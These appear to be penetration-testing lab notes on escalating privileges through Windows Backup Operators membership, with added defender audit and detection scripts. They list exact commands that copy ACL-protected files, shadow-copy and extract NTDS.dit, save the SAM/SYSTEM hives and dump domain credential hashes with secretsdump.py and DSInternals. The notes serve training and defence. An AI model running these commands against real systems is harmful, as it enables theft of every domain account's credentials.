# Intro

- Windows servers and Domain Controllers have a variety of built-in groups that either default to Windows or get added when the AD Domain Services role is installed on a system to promote a server to a Domain Controller
- Many of these groups confer special privs on their members, and some can be leveraged to privesc on a server or a Domain Controller
- [Here](https://ss64.com/nt/syntax-security_groups.html) is a listing of all built-in Windows groups along with a detailed description of each
- This [page](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-b--privileged-accounts-and-groups-in-active-directory) has a detailed listing of privileged accounts and groups in AD
- Short list of notable groups for pentesting purposes:
	- Backup Operators
	- Event Log Readers
	- DNSAdmins
	- Hyper-V Admins
	- Print Operators
	- Server Operators

# Backup Operators

- Membership in the Backup Operators group grants its members the `SeBackup` and `SeRestore` privs
- The [SeBackupPrivilege](https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/privileges) allows us to traverse any folder and list the folder contents
- This will let us copy a file from a folder, even if there is no access control entry (ACE) for the subject user in the folder's ACL
- However, we can't do this using the standard copy command; instead, we need to programmatically copy the data, making sure to specify the [FILE_FLAG_BACKUP_SEMANTICS](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea) flag

## Exploiting `SeBackupPrivilege`

- We can use this [PoC](https://github.com/giuliano108/SeBackupPrivilege) to exploit `SeBackupPrivilege` and copy a file
- First, import the libraries in a PowerShell session

```powershell
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
```

### Enable `SeBackupPrivilege`

- Now, determine whether `SeBackupPrivilege` is enabled with either of the two commands below
- NOTE: we may need an elevated session to issue these commands

```powershell
whoami /priv
Get-SeBackupPrivilege
```

- If the above shows it disabled, enable `SeBackupPrivilege` and confirm as below

```powershell
Set-SeBackupPrivilege
whoami /priv
Get-SeBackupPrivilege
```

### Copy Protected File

- Identify and enumerate the target, protected file

```powershell
dir C:\Confidential\
type 'C:\Confidential\2021 Contract.txt'
```

- The above shows that we cannot read the target, protected file
- Now, use the `Copy-FileSeBackupPrivilege` cmdlet we imported above to copy the protected file, then read it at our leisure

```powershell
Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt
type .\Contract.txt
```

### Attacking a DC - Copying `NTDS.dit`

- `SeBackupPrivilege` permits logging in locally to a domain controller
- From this vantage point, the AD db named `NTDS.dit` is a very attractive target, as it contains the NTLM hashes for all user and computer objects in the domain
- However, the `NTDS.dit` file is locked by default and not accessible by unprivileged users
- Because the `NTDS.dit` file is locked, we can use the Windows [diskshadow](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow) utility to create a shadow copy of the `C` drive and expose it as the `E` drive

```powershell-session
diskshadow.exe
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit
dir E:
```

- Next, use the `Copy-FileSeBackupPrivilege` cmdlet to bypass the ACL and copy `NTDS.dit` locally

```powershell
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
```

- `SeBackupPrivilege` also allows us to back up the SAM and SYSTEM registry hives, from which we can extract local account credentials offline using `secretsdump.py`

```cmd
reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV
```

- Finally, extract all Active Directory account credentials with the PowerShell `DSInternals` module or `secretsdump.py`

#### Extract AD creds from `NTDS.dit` using `DSInternals`

```powershell
Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHivePath .\SYSTEM
Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key
```

#### Extract AD creds from `NTDS.dit` using `secretsdump.py`

```bash
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
```

##### Copying Files with `robocopy`

- [robocopy](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/robocopy) is a command-line directory replication tool that can also copy files in backup mode

```cmd
robocopy /B E:\Windows\NTDS .\ntds ntds.dit
```

---

# Exercise

- `ping` test
![[images/Pasted image 20260219190955.png]]
- `nmap` scan
![[images/Pasted image 20260219191010.png]]
- `rdp` into target with given creds
![[images/Pasted image 20260219191100.png]]
- light internal enum
![[images/Pasted image 20260219191148.png]]
- NOTE: `SeBackup` is disabled
- look at available tools
![[images/Pasted image 20260219191359.png]]
- test target dir and file > access denied
![[images/Pasted image 20260219191321.png]]
- Import modules
![[images/Pasted image 20260219191508.png]]
- Enable `SeBackup` and confirm
![[images/Pasted image 20260219191535.png]]
- Copy target file with `Copy-FileSeBackupPrivilege` and `type`
![[images/Pasted image 20260219191709.png]]
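---

# Auditing Notable Group Membership

- Added defender-side example, not part of the original notes: list who holds direct or nested membership in the notable groups from the intro, so unexpected Backup Operators or Server Operators members stand out; it assumes the RSAT `ActiveDirectory` module on a domain-joined host and falls back to the server's local groups otherwise (the actual group names are `DnsAdmins` and `Hyper-V Administrators`)

```powershell
# Added audit example (not from the original notes): enumerate members of the
# notable built-in groups, expanding nested groups, so unexpected membership in
# Backup Operators, Server Operators etc. is visible in one table.
# Uses the RSAT ActiveDirectory module when present; otherwise queries the
# local groups of the server it runs on.
$notableGroups = @(
    'Backup Operators',
    'Event Log Readers',
    'DnsAdmins',                # AD name of the group written "DNSAdmins" above
    'Hyper-V Administrators',   # full name of "Hyper-V Admins"
    'Print Operators',
    'Server Operators'
)

$useAD = [bool](Get-Module -ListAvailable -Name ActiveDirectory)
if ($useAD) { Import-Module ActiveDirectory }

foreach ($groupName in $notableGroups) {
    $members = @()
    if ($useAD) {
        $group = Get-ADGroup -Filter "Name -eq '$groupName'" -ErrorAction SilentlyContinue
        if (-not $group) { Write-Warning "Group '$groupName' not found in the domain"; continue }
        # -Recursive expands nested groups so indirect members are reported too
        $members = Get-ADGroupMember -Identity $group -Recursive -ErrorAction SilentlyContinue |
            ForEach-Object { [pscustomobject]@{ Member = $_.SamAccountName; Type = $_.objectClass } }
    } else {
        if (-not (Get-LocalGroup -Name $groupName -ErrorAction SilentlyContinue)) {
            Write-Warning "Local group '$groupName' not found"; continue
        }
        $members = Get-LocalGroupMember -Group $groupName -ErrorAction SilentlyContinue |
            ForEach-Object { [pscustomobject]@{ Member = $_.Name; Type = $_.ObjectClass } }
    }

    if (-not $members) {
        # Empty is the expected state for most of these groups on a hardened host
        [pscustomobject]@{ Group = $groupName; Member = '(none)'; Type = '' }
        continue
    }
    foreach ($m in $members) {
        [pscustomobject]@{ Group = $groupName; Member = $m.Member; Type = $m.Type }
    }
}
```

- Pipe the output to `Format-Table -AutoSize` or `Export-Csv` to keep a baseline and diff it on later runs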
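# Detecting Backup-Privilege Abuse in the Security Log

- Added detection example, not part of the original notes: hunt the Security log for the command chain shown in the Backup Operators section (`diskshadow.exe`, `reg save` of the SAM/SYSTEM hives, `robocopy /B`, anything naming `ntds.dit`); it assumes process creation auditing (Event ID 4688) with "Include command line in process creation events" enabled, and the `$Hours` parameter and `Get-EventField` helper are my own names

```powershell
# Added detection example (not from the original notes). Scans 4688 process
# creation events for the techniques described above. Without command-line
# auditing enabled, CommandLine is empty and only the image name can match.
param([int]$Hours = 24)

function Get-EventField {
    param($Event, [string]$Name)
    # 4688 fields are stored in EventData as <Data Name="...">value</Data>
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

# Regexes tied to the commands shown on this page (-match is case-insensitive)
$patterns = @(
    @{ Label = 'diskshadow shadow copy'; Regex = 'diskshadow(\.exe)?' },
    @{ Label = 'SAM/SYSTEM hive dump';   Regex = 'reg(\.exe)?\s+save\s+HKLM\\(SAM|SYSTEM)\b' },
    @{ Label = 'robocopy backup mode';   Regex = 'robocopy(\.exe)?.*\s/B(\s|$)' },
    @{ Label = 'ntds.dit reference';     Regex = 'ntds\.dit' }
)

$filter = @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-$Hours) }
$events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

foreach ($e in $events) {
    $image = Get-EventField -Event $e -Name 'NewProcessName'
    $cmd   = Get-EventField -Event $e -Name 'CommandLine'
    $user  = Get-EventField -Event $e -Name 'SubjectUserName'
    # Match against both the image path and the full command line
    $haystack = "$image $cmd"
    foreach ($p in $patterns) {
        if ($haystack -match $p.Regex) {
            $shown = if ($cmd) { $cmd } else { $image }
            [pscustomobject]@{
                Time    = $e.TimeCreated
                User    = $user
                Finding = $p.Label
                Command = $shown
            }
        }
    }
}
```

- Event ID 4672 (special privileges assigned to new logon) lists `SeBackupPrivilege` in its `PrivilegeList` field, so filtering those events for accounts that should never hold it complements the process-based matches above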